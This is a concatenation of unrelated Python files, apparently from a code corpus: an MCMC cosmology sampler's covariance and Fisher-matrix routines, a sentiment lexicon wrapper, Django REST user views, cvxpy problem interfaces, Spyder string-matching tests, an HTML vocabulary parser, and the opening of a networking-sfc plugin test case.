                covnames = line.strip('#').replace(' ', '').\
                    replace('\n', '').split(',')
                # Initialize the matrices
                matrix = np.zeros((len(covnames), len(covnames)), 'float64')
                rot = np.zeros((len(covnames), len(covnames)))
            else:
                line = line.split()
                for j in range(len(line)):
                    matrix[i][j] = np.array(line[j], 'float64')
                i += 1
        # First print out
        if not command_line.silent and not command_line.quiet:
            print('\nInput covariance matrix:')
            print(covnames)
            print(matrix)
        # Deal with the all problematic cases.
        # First, adjust the scales between stored parameters and the ones used
        # in mcmc
        scales = []
        for elem in covnames:
            if elem in parameter_names:
                scales.append(data.mcmc_parameters[elem]['scale'])
            else:
                scales.append(1)
        scales = np.diag(scales)
        # Compute the inverse matrix, and assert that the computation was
        # precise enough, by comparing the product to the identity matrix.
        invscales = np.linalg.inv(scales)
        np.testing.assert_array_almost_equal(
            np.dot(scales, invscales), np.eye(np.shape(scales)[0]),
            decimal=5)
        # Apply the newly computed scales to the input matrix
        matrix = np.dot(invscales.T, np.dot(matrix, invscales))
        # Second print out, after having applied the scale factors
        if not command_line.silent and not command_line.quiet:
            print('\nFirst treatment (scaling)')
            print(covnames)
            print(matrix)
        # Rotate matrix for the parameters to be well ordered, even if some
        # names are missing or some are in extra.
        # First, store the parameter names in temp_names that also appear in
        # the covariance matrix, in the right ordering for the code (might be
        # different from the input matrix)
        temp_names = [elem for elem in parameter_names if elem in covnames]
        # If parameter_names contains less things than covnames, we will do a
        # small trick. Create a second temporary array, temp_names_2, that will
        # have the same dimension as covnames, and containing:
        # - the elements of temp_names, in the order of parameter_names (h
        # index)
        # - an empty string '' for the remaining unused parameters
        temp_names_2 = []
        h = 0
        not_in = [elem for elem in covnames if elem not in temp_names]
        for k in range(len(covnames)):
            if covnames[k] not in not_in:
                temp_names_2.append(temp_names[h])
                h += 1
            else:
                temp_names_2.append('')
        # Create the rotation matrix, that will put the covariance matrix in
        # the right order, and also assign zeros to the unused parameters from
        # the input. These empty columns will be removed in the next step.
        for k in range(len(covnames)):
            for h in range(len(covnames)):
                try:
                    if covnames[k] == temp_names_2[h]:
                        rot[h][k] = 1.
                    else:
                        rot[h][k] = 0.
                except IndexError:
                    # The IndexError exception means that we are dealing with
                    # an unused parameter. By enforcing the corresponding
                    # rotation matrix element to 0, the resulting matrix will
                    # still have the same size as the original, but with zeros
                    # on the unused lines.
                    rot[h][k] = 0.
        matrix = np.dot(rot, np.dot(matrix, np.transpose(rot)))
        # Third print out
        if not command_line.silent and not command_line.quiet:
            print('\nSecond treatment (partial reordering and cleaning)')
            print(temp_names_2)
            print(matrix)
        # Final step, creating a temporary matrix, filled with 1, that will
        # eventually contain the result.
        matrix_temp = np.ones((len(parameter_names),
                               len(parameter_names)), 'float64')
        indices_final = np.zeros(len(parameter_names))
        indices_initial = np.zeros(len(covnames))
        # Remove names that are in parameter names but not in covnames, and
        # set to zero the corresponding columns of the final result.
        for k in range(len(parameter_names)):
            if parameter_names[k] in covnames:
                indices_final[k] = 1
        for zeros in np.where(indices_final == 0)[0]:
            matrix_temp[zeros, :] = 0
            matrix_temp[:, zeros] = 0
        # Remove names that are in covnames but not in param_names
        for h in range(len(covnames)):
            if covnames[h] in parameter_names:
                indices_initial[h] = 1
        # There, put a placeholder number (the largest representable float,
        # which cannot occur in a real covariance matrix) in the initial
        # matrix, so that the next step only copies the interesting part of
        # the input to the final matrix.
        max_value = np.finfo(np.float64).max
        for zeros in np.where(indices_initial == 0)[0]:
            matrix[zeros, :] = [max_value for _ in range(
                len(matrix[zeros, :]))]
            matrix[:, zeros] = [max_value for _ in range(
                len(matrix[:, zeros]))]
        # Now put in the temporary matrix, where the 1 were, the interesting
        # quantities from the input (the ones not equal to the placeholder).
        matrix_temp[matrix_temp == 1] = matrix[matrix != max_value]
        matrix = np.copy(matrix_temp)
        # on all other lines, that contain 0, just use sigma^2
        for zeros in np.where(indices_final == 0)[0]:
            matrix[zeros, zeros] = np.array(
                data.mcmc_parameters[parameter_names[zeros]]['initial'][3],
                'float64')**2
    # else, take sigmas^2.
    else:
        matrix = np.identity(len(parameter_names), 'float64')
        for index, elem in enumerate(parameter_names):
            matrix[index][index] = np.array(
                data.mcmc_parameters[elem]['initial'][3], 'float64')**2
    # Final print out, the actually used covariance matrix
    if not command_line.silent and not command_line.quiet:
        sys.stdout.write('\nDeduced starting covariance matrix:\n')
        print(parameter_names)
        print(matrix)
    #inverse, and diagonalization
    eigv, eigV = np.linalg.eig(np.linalg.inv(matrix))
    return eigv, eigV, matrix
def accept_step(data):
    """
    Transfer the 'current' point in the varying parameters to the last accepted
    one.
    """
    # Varying parameters first, then derived — same order as before.
    for group in ('varying', 'derived'):
        for name in data.get_mcmc_parameters([group]):
            param = data.mcmc_parameters[name]
            param['last_accepted'] = param['current']
def check_flat_bound_priors(parameters, names):
    """
    Ensure that all varying parameters are bound and flat
    It is a necessary condition to use the code with Nested Sampling or the
    Cosmo Hammer.

    Returns the tuple (is_flat, is_bound).
    """
    is_flat = True
    is_bound = True
    for name in names:
        prior = parameters[name]['prior']
        if prior.prior_type != 'flat':
            is_flat = False
        if not prior.is_bound():
            is_bound = False
    return is_flat, is_bound
def compute_lkl(cosmo, data):
    """
    Compute the likelihood, given the current point in parameter space.
    This function now performs a test before calling the cosmological model
    (**new in version 1.2**). If any cosmological parameter changed, the flag
    :code:`data.need_cosmo_update` will be set to :code:`True`, from the
    routine :func:`check_for_slow_step <data.Data.check_for_slow_step>`.
    Returns
    -------
    loglike : float
        The log of the likelihood (:math:`\\frac{-\chi^2}2`) computed from the
        sum of the likelihoods of the experiments specified in the input
        parameter file.
        This function returns :attr:`data.boundary_loglike
        <data.data.boundary_loglike>`, defined in the module :mod:`data` if
        *i)* the current point in the parameter space has hit a prior edge, or
        *ii)* the cosmological module failed to compute the model. This value
        is chosen to be extremely small (large negative value), so that the step
        will always be rejected.
    """
    # Lazy import: classy is only needed once a model is actually evaluated.
    from classy import CosmoSevereError, CosmoComputationError
    # If the cosmological module has already been called once, and if the
    # cosmological parameters have changed, then clean up, and compute.
    if cosmo.state and data.need_cosmo_update is True:
        cosmo.struct_cleanup()
    # If the data needs to change, then do a normal call to the cosmological
    # compute function. Note that, even if need_cosmo update is True, this
    # function must be called if the jumping factor is set to zero. Indeed,
    # this means the code is called for only one point, to set the fiducial
    # model.
    if ((data.need_cosmo_update) or
            (not cosmo.state) or
            (data.jumping_factor == 0)):
        # Prepare the cosmological module with the new set of parameters
        cosmo.set(data.cosmo_arguments)
        # Compute the model, keeping track of the errors
        # In classy.pyx, we made use of two type of python errors, to handle
        # two different situations.
        # - CosmoSevereError is returned if a parameter was not properly set
        # during the initialisation (for instance, you entered Ommega_cdm
        # instead of Omega_cdm). Then, the code exits, to prevent running with
        # imaginary parameters. This behaviour is also used in case you want to
        # kill the process.
        # - CosmoComputationError is returned if Class fails to compute the
        # output given the parameter values. This will be considered as a valid
        # point, but with minimum likelihood, so will be rejected, resulting in
        # the choice of a new point.
        try:
            cosmo.compute(["lensing"])
        except CosmoComputationError as failure_message:
            sys.stderr.write(str(failure_message)+'\n')
            sys.stderr.flush()
            return data.boundary_loglike
        except CosmoSevereError as critical_message:
            raise io_mp.CosmologicalModuleError(
                "Something went wrong when calling CLASS" +
                str(critical_message))
        except KeyboardInterrupt:
            raise io_mp.CosmologicalModuleError(
                "You interrupted execution")
    # For each desired likelihood, compute its value against the theoretical
    # model
    loglike = 0
    # This flag holds the information whether a fiducial model was written. In
    # this case, the log likelihood returned will be '1j', meaning the
    # imaginary number i.
    flag_wrote_fiducial = 0
    # NOTE: dict.itervalues()/iteritems() below are Python 2 only; this
    # module predates Python 3.
    for likelihood in data.lkl.itervalues():
        if likelihood.need_update is True:
            value = likelihood.loglkl(cosmo, data)
            # Storing the result
            likelihood.backup_value = value
        # Otherwise, take the existing value
        else:
            value = likelihood.backup_value
        loglike += value
        # In case the fiducial file was written, store this information
        if value == 1j:
            flag_wrote_fiducial += 1
    # Compute the derived parameters if relevant
    if data.get_mcmc_parameters(['derived']) != []:
        try:
            derived = cosmo.get_current_derived_parameters(
                data.get_mcmc_parameters(['derived']))
            for name, value in derived.iteritems():
                data.mcmc_parameters[name]['current'] = value
        except AttributeError:
            # This happens if the classy wrapper is still using the old
            # convention, expecting data as the input parameter
            cosmo.get_current_derived_parameters(data)
        except CosmoSevereError:
            raise io_mp.CosmologicalModuleError(
                "Could not write the current derived parameters")
        # Store derived parameters in the internal (rescaled) convention.
        for elem in data.get_mcmc_parameters(['derived']):
            data.mcmc_parameters[elem]['current'] /= \
                data.mcmc_parameters[elem]['scale']
    # If fiducial files were created, inform the user, and exit
    if flag_wrote_fiducial > 0:
        if flag_wrote_fiducial == len(data.lkl):
            raise io_mp.FiducialModelWritten(
                "Fiducial file(s) was(were) created, please start a new chain")
        else:
            raise io_mp.FiducialModelWritten(
                "Some previously non-existing fiducial files were created, " +
                "but potentially not all of them. Please check now manually" +
                " on the headers, of the corresponding that all parameters " +
                "are coherent for your tested models")
    return loglike
def compute_fisher(data, cosmo, center, step_size):
    """Assemble the Fisher matrix and log-likelihood gradient at `center`.

    Each element is obtained from compute_fisher_element; only the upper
    triangle plus the diagonal are evaluated, the rest is filled in by
    symmetry.  The call order (diagonal of row k first, then the
    off-diagonals of that row) matches the original implementation.
    """
    parameter_names = data.get_mcmc_parameters(['varying'])
    dim = len(parameter_names)
    fisher_matrix = np.zeros((dim, dim), 'float64')
    # Initialise the gradient field
    gradient = np.zeros(dim, 'float64')

    def _step(value):
        # Relative finite-difference step, falling back to the absolute
        # step when the center value is exactly zero.
        delta = value * step_size
        return delta if delta != 0.0 else step_size

    for k, elem_k in enumerate(parameter_names):
        kdiff = _step(center[elem_k])
        # Diagonal entry also yields the gradient component.
        fisher_matrix[k][k], gradient[k] = compute_fisher_element(
            data, cosmo, center, (elem_k, kdiff))
        for h in range(k + 1, dim):
            elem_h = parameter_names[h]
            hdiff = _step(center[elem_h])
            value = compute_fisher_element(
                data, cosmo, center,
                (elem_k, kdiff),
                (elem_h, hdiff))
            fisher_matrix[k][h] = value
            fisher_matrix[h][k] = value
    return fisher_matrix, gradient
def compute_fisher_element(data, cosmo, center, one, two=None):
    """Compute one Fisher-matrix entry by central finite differences.

    `one` and `two` are (parameter_name, step) pairs. With `two` given,
    the mixed second derivative (an off-diagonal element) is returned;
    otherwise the diagonal element plus the first-derivative (gradient)
    component for that parameter is returned as a tuple.

    NOTE(review): the perturbed 'current' values are not restored to
    `center` before returning — callers appear to reset them themselves;
    confirm before reusing this helper elsewhere.
    """
    # Unwrap
    name_1, diff_1 = one
    if two:
        name_2, diff_2 = two
        # Four-point stencil: evaluate lnL at (+d1,+d2), (+d1,-d2),
        # (-d1,+d2) and (-d1,-d2) around the center, in that order.
        data.mcmc_parameters[name_1]['current'] = (
            center[name_1]+diff_1)
        data.mcmc_parameters[name_2]['current'] = (
            center[name_2]+diff_2)
        data.update_cosmo_arguments()
        loglike_1 = compute_lkl(cosmo, data)
        data.mcmc_parameters[name_2]['current'] -= 2*diff_2
        data.update_cosmo_arguments()
        loglike_2 = compute_lkl(cosmo, data)
        data.mcmc_parameters[name_1]['current'] -= 2*diff_1
        data.mcmc_parameters[name_2]['current'] += 2*diff_2
        data.update_cosmo_arguments()
        loglike_3 = compute_lkl(cosmo, data)
        data.mcmc_parameters[name_2]['current'] -= 2*diff_2
        data.update_cosmo_arguments()
        loglike_4 = compute_lkl(cosmo, data)
        # Standard central-difference estimate of -d2 lnL / (dx1 dx2).
        fisher_off_diagonal = -(
            loglike_1-loglike_2-loglike_3+loglike_4)/(4.*diff_1*diff_2)
        return fisher_off_diagonal
    # It is otherwise a diagonal component
    else:
        # Three-point stencil: lnL at center, center+d1 and center-d1.
        data.mcmc_parameters[name_1]['current'] = center[name_1]
        data.update_cosmo_arguments()
        loglike_1 = compute_lkl(cosmo, data)
        data.mcmc_parameters[name_1]['current'] += diff_1
        data.update_cosmo_arguments()
        loglike_2 = compute_lkl(cosmo, data)
        data.mcmc_parameters[name_1]['current'] -= 2*diff_1
        data.update_cosmo_arguments()
        loglike_3 = compute_lkl(cosmo, data)
        # Second derivative: -d2 lnL / dx^2 via (f(+d) - 2f(0) + f(-d))/d^2.
        fisher_diagonal = -(
            loglike_2-2.*loglike_1+loglike_3)/(diff_1**2)
        # First derivative with the same sign convention as the matrix.
        gradient = -(loglike_2-loglike_3)/(2.*diff_1)
        return fisher_diagonal, gradient
|
import pkg_resources, json
from word2lex.utils.custom_vader import SentimentIntensityAnalyzer
# Directory holding the lexicon JSON files bundled with the package.
ROOT_PATH = pkg_resources.resource_filename('word2lex', 'data/')
# Names of the available lexicons; each maps to a <name>.json file in data/.
AVAILABLE_MODELS = ['britain',
                    'usa',
                    'canada',
                    'politics_en',
                    'news_media',
                    'twitter']
# Load every lexicon once at import time so all Word2Lex instances share
# the parsed dictionaries instead of re-reading the JSON files.
GLOBAL_DICT = {}
for c in AVAILABLE_MODELS:
    with open(ROOT_PATH + c + '.json', 'r') as fp:
        GLOBAL_DICT[c] = json.load(fp)
class Word2Lex(object):
    """Sentiment scorer backed by one of the bundled VADER-style lexicons.

    The lexicon is chosen by name from ``AVAILABLE_MODELS`` and wrapped in
    a ``SentimentIntensityAnalyzer``.
    """

    def __init__(self, model='politics_en'):
        """Select a lexicon.

        model -- one of the names in AVAILABLE_MODELS; an unknown string
                 raises ValueError. A non-string silently falls back to
                 'politics_en' (historical behavior, preserved).
        """
        # Fix: use isinstance instead of `type(model) == str` so that
        # str subclasses are accepted too (and per Python idiom).
        if isinstance(model, str):
            if model in AVAILABLE_MODELS:
                self.dictionary = GLOBAL_DICT[model]
            else:
                raise ValueError("Available dictionaries are 'canada', 'usa', 'britain', 'politics_en', 'news_media' and 'twitter'.")
        else:
            # Preserve legacy behavior: non-string input gets the default.
            self.dictionary = GLOBAL_DICT['politics_en']
        self.analyzer = SentimentIntensityAnalyzer(self.dictionary)

    def sentiment(self, text):
        """Return the compound polarity score of `text` (float in [-1, 1]
        per VADER convention — confirm against custom_vader)."""
        return self.analyzer.polarity_scores(text)['compound']
|
"""Users views."""
# Django REST Framework
from rest_framework import mixins, status, viewsets
from rest_framework.decorators import action
from rest_framework.response import Response
# Permissions
from rest_framework.permissions import (
AllowAny,
IsAuthenticated
)
from pmanagement.users.permissions import IsAccountOwner
# Serializer
from pmanagement.users.serializers.profiles import ProfileModelSerializer
from pmanagement.projects.serializers import ProjectModelSerializer
from pmanagement.users.serializers import (
UserLoginSerializer,
UserModelSerializer,
UserSignUpSerializer
)
# Models
from pmanagement.users.models import User
from pmanagement.projects.models import Project
class UserViewSet(mixins.RetrieveModelMixin,
                  mixins.UpdateModelMixin,
                  viewsets.GenericViewSet):
    """User view set.

    Handles sign up, login, profile updates and user retrieval.
    Users are looked up by ``username`` rather than primary key.
    """
    queryset = User.objects.all()
    serializer_class = UserModelSerializer
    lookup_field = 'username'
    def get_permissions(self):
        """Assign permissions based on the current action."""
        if self.action in ['signup', 'login']:
            # Anonymous users must be able to create accounts and log in.
            permission = [AllowAny]
        elif self.action in ['retrieve', 'update', 'partial_update']:
            # Only the account owner may read or modify the account.
            permission = [IsAuthenticated, IsAccountOwner]
        else:
            permission = [IsAuthenticated]
        return [p() for p in permission]
    @action(detail=False, methods=['post'])
    def login(self, request):
        """User login: validate credentials and return user data + token."""
        serializer = UserLoginSerializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        user, token = serializer.save()
        data = {
            'user': UserModelSerializer(user).data,
            # NOTE(review): 'acces_token' is misspelled ('access_token'),
            # but clients may already depend on this key — confirm before
            # renaming it.
            'acces_token': token,
        }
        return Response(data, status=status.HTTP_201_CREATED)
    @action(detail=False, methods=['post'])
    def signup(self, request):
        """User signup: create an account and return its serialized data."""
        serializer = UserSignUpSerializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        user = serializer.save()
        data = UserModelSerializer(user).data
        return Response(data, status=status.HTTP_201_CREATED)
    @action(detail=True, methods=['put', 'patch'])
    def profile(self, request, *args, **kwargs):
        """Update (PUT) or partially update (PATCH) the user's profile."""
        user = self.get_object()
        profile = user.profile
        # PATCH allows partial payloads; PUT requires the full profile.
        partial = request.method == 'PATCH'
        serializer = ProfileModelSerializer(
            profile,
            data=request.data,
            partial=partial
        )
        serializer.is_valid(raise_exception=True)
        serializer.save()
        data = UserModelSerializer(user).data
        return Response(data)
    def retrieve(self, request, *args, **kwargs):
        """Add the requesting user's projects to the retrieve response."""
        response = super(UserViewSet, self).retrieve(request, *args, **kwargs)
        # Projects are filtered by the *requesting* user, not the looked-up
        # user — presumably intentional since only the owner can retrieve.
        projects = Project.objects.filter(
            members=request.user,
        )
        data = {
            'user': response.data,
            'project': ProjectModelSerializer(projects, many=True).data
        }
        response.data = data
        return response
|
from abc import ABC, abstractmethod
from typing import List, Union
import cvxpy as cp
class CvxpyProblem(ABC):
    """Abstract interface around a parametrized cvxpy optimization problem."""

    @abstractmethod
    def problem(self) -> cp.Problem:
        """Return the underlying cvxpy Problem."""

    @abstractmethod
    def parameters(self) -> List[cp.Parameter]:
        """Return the problem's cvxpy Parameters."""

    @abstractmethod
    def variables(self) -> List[cp.Variable]:
        """Return the problem's decision Variables."""

    @abstractmethod
    def solve(self, *args) -> dict:
        """Solve the problem and return the results as a dict."""

    def parameter_size(self) -> int:
        """Total number of scalar entries across all parameters."""
        return sum(p.size for p in self.parameters())

    def variable_size(self) -> int:
        """Total number of scalar entries across all variables."""
        return sum(v.size for v in self.variables())
class MPCProblem(CvxpyProblem):
    # Specialization of CvxpyProblem for model-predictive-control problems.
    @abstractmethod
    def reduced_objective(self) -> Union[cp.Minimize, cp.Maximize]:
        """Return a reduced objective for the MPC problem (semantics defined
        by concrete subclasses — not constrained here)."""
        pass
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
#
"""
Tests for stringmatching.py
"""
# Standard library imports
import os
# Test library imports
import pytest
# Local imports
from spyder.utils.stringmatching import get_search_scores
TEST_FILE = os.path.join(os.path.dirname(__file__), 'data/example.py')
def test_stringmatching_full():
    """Test stringmatching full results.

    With valid_only/sort left at their defaults, get_search_scores must
    return one tuple per input name, in input order: non-matches keep the
    plain text with score -1, matches get the query wrapped in the
    template and a positive score (lower = better).
    """
    template = '<b>{0}</b>'
    names = ['close pane', 'debug continue', 'debug exit', 'debug step into',
             'debug step over', 'debug step return', 'fullscreen mode',
             'layout preferences', 'lock unlock panes', 'maximize pane',
             'preferences', 'quit', 'restart', 'save current layout',
             'switch to breakpoints', 'switch to console', 'switch to editor',
             'switch to explorer', 'switch to find_in_files',
             'switch to historylog', 'switch to help',
             'switch to ipython_console', 'switch to onlinehelp',
             'switch to outline_explorer', 'switch to project_explorer',
             'switch to variable_explorer',
             'use next layout', 'use previous layout', 'clear line',
             'clear shell', 'inspect current object', 'blockcomment',
             'breakpoint', 'close all', 'code completion',
             'conditional breakpoint', 'configure', 'copy', 'copy line', 'cut',
             'debug', 'debug with winpdb', 'delete', 'delete line',
             'duplicate line', 'end of document', 'end of line',
             'file list management', 'find next', 'find previous', 'find text',
             'go to definition', 'go to line', 'go to next file',
             'go to previous file', 'inspect current object', 'kill next word',
             'kill previous word', 'kill to line end', 'kill to line start',
             'last edit location', 'move line down', 'move line up',
             'new file', 'next char', 'next cursor position', 'next line',
             'next word', 'open file', 'paste', 'previous char',
             'previous cursor position', 'previous line', 'previous word',
             'print', 're-run last script', 'redo', 'replace text',
             'rotate kill ring', 'run', 'run selection', 'save all', 'save as',
             'save file', 'select all', 'show/hide outline',
             'show/hide project explorer', 'start of document',
             'start of line', 'toggle comment', 'unblockcomment', 'undo',
             'yank', 'run profiler', 'run analysis']
    full_results = get_search_scores('lay', names, template=template, )
    assert full_results == [('close pane', 'close pane', -1),
                            ('debug continue', 'debug continue', -1),
                            ('debug exit', 'debug exit', -1),
                            ('debug step into', 'debug step into', -1),
                            ('debug step over', 'debug step over', -1),
                            ('debug step return', 'debug step return', -1),
                            ('fullscreen mode', 'fullscreen mode', -1),
                            ('layout preferences', '<b>lay</b>out preferences',
                             400100),
                            ('lock unlock panes', 'lock unlock panes', -1),
                            ('maximize pane', 'maximize pane', -1),
                            ('preferences', 'preferences', -1),
                            ('quit', 'quit', -1),
                            ('restart', 'restart', -1),
                            ('save current layout',
                             'save current <b>lay</b>out', 400113),
                            ('switch to breakpoints',
                             'switch to breakpoints', -1),
                            ('switch to console', 'switch to console', -1),
                            ('switch to editor', 'switch to editor', -1),
                            ('switch to explorer', 'switch to explorer', -1),
                            ('switch to find_in_files',
                             'switch to find_in_files', -1),
                            ('switch to historylog',
                             'switch to historylog', -1),
                            ('switch to help', 'switch to help', -1),
                            ('switch to ipython_console',
                             'switch to ipython_console', -1),
                            ('switch to onlinehelp',
                             'switch to onlinehelp', -1),
                            ('switch to outline_explorer',
                             'switch to outline_explorer', -1),
                            ('switch to project_explorer',
                             'switch to project_explorer', -1),
                            ('switch to variable_explorer',
                             'switch to variable_explorer', -1),
                            ('use next layout', 'use next <b>lay</b>out',
                             400109),
                            ('use previous layout',
                             'use previous <b>lay</b>out', 400113),
                            ('clear line', 'clear line', -1),
                            ('clear shell', 'clear shell', -1),
                            ('inspect current object',
                             'inspect current object', -1),
                            ('blockcomment', 'blockcomment', -1),
                            ('breakpoint', 'breakpoint', -1),
                            ('close all', 'close all', -1),
                            ('code completion', 'code completion', -1),
                            ('conditional breakpoint',
                             'conditional breakpoint', -1),
                            ('configure', 'configure', -1),
                            ('copy', 'copy', -1),
                            ('copy line', 'copy line', -1),
                            ('cut', 'cut', -1),
                            ('debug', 'debug', -1),
                            ('debug with winpdb', 'debug with winpdb', -1),
                            ('delete', 'delete', -1),
                            ('delete line', 'delete line', -1),
                            ('duplicate line', 'duplicate line', -1),
                            ('end of document', 'end of document', -1),
                            ('end of line', 'end of line', -1),
                            ('file list management',
                             'file list management', -1),
                            ('find next', 'find next', -1),
                            ('find previous', 'find previous', -1),
                            ('find text', 'find text', -1),
                            ('go to definition', 'go to definition', -1),
                            ('go to line', 'go to line', -1),
                            ('go to next file', 'go to next file', -1),
                            ('go to previous file', 'go to previous file', -1),
                            ('inspect current object',
                             'inspect current object', -1),
                            ('kill next word', 'kill next word', -1),
                            ('kill previous word', 'kill previous word', -1),
                            ('kill to line end', 'kill to line end', -1),
                            ('kill to line start', 'kill to line start', -1),
                            ('last edit location', 'last edit location', -1),
                            ('move line down', 'move line down', -1),
                            ('move line up', 'move line up', -1),
                            ('new file', 'new file', -1),
                            ('next char', 'next char', -1),
                            ('next cursor position',
                             'next cursor position', -1),
                            ('next line', 'next line', -1),
                            ('next word', 'next word', -1),
                            ('open file', 'open file', -1),
                            ('paste', 'paste', -1),
                            ('previous char', 'previous char', -1),
                            ('previous cursor position',
                             'previous cursor position', -1),
                            ('previous line', 'previous line', -1),
                            ('previous word', 'previous word', -1),
                            ('print', 'print', -1),
                            ('re-run last script', 're-run last script', -1),
                            ('redo', 'redo', -1),
                            ('replace text', 'replace text', -1),
                            ('rotate kill ring', 'rotate kill ring', -1),
                            ('run', 'run', -1),
                            ('run selection', 'run selection', -1),
                            ('save all', 'save all', -1),
                            ('save as', 'save as', -1),
                            ('save file', 'save file', -1),
                            ('select all', 'select all', -1),
                            ('show/hide outline', 'show/hide outline', -1),
                            ('show/hide project explorer',
                             'show/hide project explorer', -1),
                            ('start of document', 'start of document', -1),
                            ('start of line', 'start of line', -1),
                            ('toggle comment', 'toggle comment', -1),
                            ('unblockcomment', 'unblockcomment', -1),
                            ('undo', 'undo', -1), ('yank', 'yank', -1),
                            ('run profiler', 'run profiler', -1),
                            ('run analysis', 'run analysis', -1)]
def test_stringmatching_order_filter():
    """Test stringmatching ordered and filtered.

    With valid_only=True and sort=True, only the names matching the
    query must be returned, ordered by ascending score (best match
    first).
    """
    template = '<b>{0}</b>'
    names = ['close pane', 'debug continue', 'debug exit', 'debug step into',
             'debug step over', 'debug step return', 'fullscreen mode',
             'layout preferences', 'lock unlock panes', 'maximize pane',
             'preferences', 'quit', 'restart', 'save current layout',
             'switch to breakpoints', 'switch to console', 'switch to editor',
             'switch to explorer', 'switch to find_in_files',
             'switch to historylog', 'switch to help',
             'switch to ipython_console', 'switch to onlinehelp',
             'switch to outline_explorer', 'switch to project_explorer',
             'switch to variable_explorer',
             'use next layout', 'use previous layout', 'clear line',
             'clear shell', 'inspect current object', 'blockcomment',
             'breakpoint', 'close all', 'code completion',
             'conditional breakpoint', 'configure', 'copy', 'copy line', 'cut',
             'debug', 'debug with winpdb', 'delete', 'delete line',
             'duplicate line', 'end of document', 'end of line',
             'file list management', 'find next', 'find previous', 'find text',
             'go to definition', 'go to line', 'go to next file',
             'go to previous file', 'inspect current object', 'kill next word',
             'kill previous word', 'kill to line end', 'kill to line start',
             'last edit location', 'move line down', 'move line up',
             'new file', 'next char', 'next cursor position', 'next line',
             'next word', 'open file', 'paste', 'previous char',
             'previous cursor position', 'previous line', 'previous word',
             'print', 're-run last script', 'redo', 'replace text',
             'rotate kill ring', 'run', 'run selection', 'save all', 'save as',
             'save file', 'select all', 'show/hide outline',
             'show/hide project explorer', 'start of document',
             'start of line', 'toggle comment', 'unblockcomment', 'undo',
             'yank', 'run profiler', 'run analysis']
    order_filter_results = get_search_scores('lay', names, template=template,
                                             valid_only=True, sort=True)
    assert order_filter_results == [('layout preferences',
                                     '<b>lay</b>out preferences', 400100),
                                    ('use next layout',
                                     'use next <b>lay</b>out', 400109),
                                    ('save current layout',
                                     'save current <b>lay</b>out', 400113),
                                    ('use previous layout',
                                     'use previous <b>lay</b>out', 400113)]
# Allow running this test module directly, outside the pytest CLI.
if __name__ == "__main__":
    pytest.main()
|
from bs4 import BeautifulSoup
def parseFile(filename):
    """Parse one vocabulary-unit HTML file into a list of entries.

    Each entry is a dict with keys:
      'korean'   -- text of the sibling preceding the toggle span
      'english'  -- text of the collapseomatic toggle span itself
      'examples' -- iterator over the children of the matching
                    collapseomatic_content div (or, if absent, the
                    span's next sibling)

    NOTE: 'examples' is a lazy bs4 iterator; it can only be consumed
    once (printParse does exactly that).
    """
    with open(filename, 'r') as f:
        html_text = f.read()
    soup = BeautifulSoup(html_text, 'html.parser')
    words = []
    for s in soup.find_all("span", {"class": "collapseomatic"}):
        korean = s.previous_sibling.previous_sibling.text
        english = s.text
        c = s.parent.find("div", {'class': "collapseomatic_content"})
        # Fix: identity comparison with None (was `c == None`, which
        # triggers bs4's __eq__ machinery and is non-idiomatic).
        if c is None:
            c = s.parent.next_sibling
        words.append({'korean': korean, 'english': english, 'examples': c.children})
    return words
def printParse(words):
    """Print each entry as one tab-separated line:
    korean<TAB>english<TAB>examples (whitespace-flattened)."""
    for entry in words:
        examples = "".join(
            str(part).replace('\n', ' ').replace('\r', '').replace('\t', '')
            for part in entry["examples"]
        )
        print(entry["korean"], entry["english"], examples, sep="\t")
def main():
    """Parse and print vocabulary units 1 through 25."""
    for i in range(1, 25+1):
        words = parseFile("./units/" + str(i) + ".html")
        printParse(words)


# Fix: guard the entry point so importing this module no longer runs
# the full parse as a side effect.
if __name__ == "__main__":
    main()
# Copyright 2015 Futurewei. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from unittest import mock
from networking_sfc.services.flowclassifier.common import context as fc_ctx
from networking_sfc.services.flowclassifier.common import exceptions as fc_exc
from networking_sfc.tests.unit.db import test_flowclassifier_db
# Dotted path of the plugin under test; handed to the DB test base class's
# setUp so it loads the real FlowClassifierPlugin.
FLOWCLASSIFIER_PLUGIN_KLASS = (
    "networking_sfc.services.flowclassifier."
    "plugin.FlowClassifierPlugin"
)
class FlowClassifierPluginTestCase(
    test_flowclassifier_db.FlowClassifierDbPluginTestCase
):
    """Exercise FlowClassifierPlugin against a mocked driver manager.

    The real FlowClassifierDriverManager is patched out so each test can
    assert which driver hooks (precommit / postcommit / delete) the
    plugin invokes, and how the plugin reacts when a driver raises.
    """

    def setUp(
        self, core_plugin=None, flowclassifier_plugin=None, ext_mgr=None
    ):
        if not flowclassifier_plugin:
            flowclassifier_plugin = FLOWCLASSIFIER_PLUGIN_KLASS
        # Replace the driver manager class with a mock; individual tests
        # override its hook methods to record contexts or raise errors.
        self.driver_manager_p = mock.patch(
            'networking_sfc.services.flowclassifier.driver_manager.'
            'FlowClassifierDriverManager'
        )
        self.fake_driver_manager_class = self.driver_manager_p.start()
        self.fake_driver_manager = mock.Mock()
        self.fake_driver_manager_class.return_value = self.fake_driver_manager
        # Contexts captured by the _record_context* side effects below.
        self.plugin_context = None
        self.plugin_context_precommit = None
        self.plugin_context_postcommit = None
        super(FlowClassifierPluginTestCase, self).setUp(
            core_plugin=core_plugin,
            flowclassifier_plugin=flowclassifier_plugin,
            ext_mgr=ext_mgr
        )

    def _record_context(self, plugin_context):
        """Side effect: capture the context passed to a driver hook."""
        self.plugin_context = plugin_context

    def _record_context_precommit(self, plugin_context):
        """Side effect: capture the context passed to a precommit hook."""
        self.plugin_context_precommit = plugin_context

    def _record_context_postcommit(self, plugin_context):
        """Side effect: capture the context passed to a postcommit hook."""
        self.plugin_context_postcommit = plugin_context

    def test_create_flow_classifier_driver_manager_called(self):
        """Create must invoke pre/postcommit with the created classifier."""
        self.fake_driver_manager.create_flow_classifier_precommit = mock.Mock(
            side_effect=self._record_context_precommit)
        self.fake_driver_manager.create_flow_classifier_postcommit = mock.Mock(
